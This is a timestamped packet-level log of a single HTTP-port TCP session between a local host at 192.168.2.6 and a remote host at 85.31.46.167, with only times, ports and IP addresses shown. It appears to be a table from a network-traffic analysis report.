Oct 3, 2022 17:42:37.007339001 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.007380009 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.007380962 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.007411957 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.007431984 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.007443905 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.007477045 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.007493973 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.007508993 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.007553101 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.007584095 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.007626057 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.007627010 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.007658005 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.007699966 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.007704020 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.007733107 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.007798910 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.007801056 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.007832050 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.007872105 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.007874012 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.007906914 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.007946968 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.007949114 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.007981062 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.008003950 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.008013964 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.008047104 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.008063078 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.008079052 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.008119106 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.008152008 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.008176088 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.008183956 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.008215904 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.008224964 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.008246899 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.008277893 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.008277893 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.008312941 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.008353949 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.008357048 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.008399963 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.008439064 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.008440971 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.008474112 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.008516073 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.008532047 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.008564949 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.008596897 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.008603096 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.008630037 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.008670092 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.008673906 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.008707047 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.008743048 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.008748055 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.008781910 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.008785963 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.008814096 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.008846045 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.008850098 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.008878946 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.008920908 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.008953094 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.008994102 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.008996010 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.009026051 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.009068966 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.009068966 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.009100914 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.009140015 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.009143114 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.009175062 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.009218931 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.009219885 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.009252071 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.009278059 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.009284973 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.009315014 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.009316921 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.009350061 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.009377003 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.009382010 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.009413958 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.009454966 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.009486914 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.009500027 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.010246992 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.010301113 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.010349035 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.010368109 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.011969090 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.012177944 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.014491081 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.036658049 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.036699057 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.036746979 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.036777020 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.036815882 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.036844969 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.036884069 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.036911964 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.036941051 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.036969900 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.037009001 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.037036896 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.037048101 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.037048101 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.037049055 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.037075043 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.037106991 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.037137032 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.037148952 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.037149906 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.037149906 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.037168026 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.037195921 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.037195921 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.037199974 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.037230968 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.037259102 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.037280083 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.037290096 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.037332058 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.037345886 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.037362099 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.037401915 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.037415981 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.037431002 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.037461996 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.037473917 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.037492037 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.037533998 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.037550926 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.037564039 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.037601948 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.037631035 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.037658930 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.037672043 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.037688017 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.037728071 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.037743092 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.037756920 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.037795067 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.037807941 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.037825108 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.037863016 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.037874937 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.037892103 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.037930012 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.037939072 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.037959099 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.037997961 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.038008928 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.038027048 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.038065910 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.038077116 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.038096905 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.038132906 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.038147926 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.038161993 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.038199902 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.038211107 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.038229942 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.038265944 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.038279057 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.038295984 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.038333893 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.038346052 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.038363934 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.038403034 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.038418055 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.038431883 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.038470030 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.038484097 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.038499117 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.038538933 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.038551092 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.038570881 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.038599014 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.038621902 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.038629055 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.038650990 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.038657904 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.038685083 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.038687944 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.038717031 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.038724899 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.038747072 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.038775921 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.038790941 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.038805008 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.038844109 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.038857937 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.038893938 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.038930893 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.038933039 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.038960934 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.038999081 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.039011955 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.039027929 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.039066076 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.039076090 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.039094925 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.039132118 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.039140940 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.039163113 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.039192915 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.039206028 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.039222002 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.039261103 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.039271116 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.039290905 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.039319038 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.039335966 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.039347887 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.039387941 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.039398909 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.039418936 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.039448023 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.039464951 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.039477110 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.039515972 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.039527893 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.039546013 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.039573908 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.039594889 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.039603949 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.039624929 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.039633989 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.039664030 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.039681911 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.039691925 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.039731979 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.039762020 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.039800882 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.039813995 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.039830923 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.039868116 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.039880037 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.039897919 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.039935112 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.039947033 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.039964914 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.040003061 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.040014029 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.040031910 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.040069103 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.040079117 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.040097952 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.040128946 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.040155888 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.040179968 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.040185928 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.040216923 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.040246010 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.040283918 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.040294886 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.040313005 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.040342093 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.040358067 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.040375948 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.040414095 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.040433884 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.040442944 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.040472031 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.040512085 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.040539980 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.040556908 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.040569067 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.040606022 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.040621042 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.040636063 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.040673971 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.040684938 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.043216944 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.052438974 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.058815002 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.067866087 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.067912102 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.067965984 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.067997932 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.068042040 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.068074942 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.068114996 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.068144083 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.068181992 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.068211079 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.068239927 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.068269014 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.068286896 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.068286896 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.068299055 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.068340063 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.068365097 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.068372011 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.068401098 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.068418980 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.068443060 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.068487883 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.068504095 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.068516970 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.068569899 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.068571091 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.068608999 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.068641901 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.068648100 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.068675041 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.068717957 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.068731070 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.068751097 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.068794012 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.068808079 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.068828106 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.068870068 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.068876028 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.068902016 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.068934917 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.068941116 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.068968058 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.069010019 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.069025993 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.069046974 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.069078922 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.069097042 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.069112062 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.069144011 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.069144964 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.069179058 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:37.069240093 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:37.069250107 CEST	80	49711	85.31.46.167	192.168.2.6
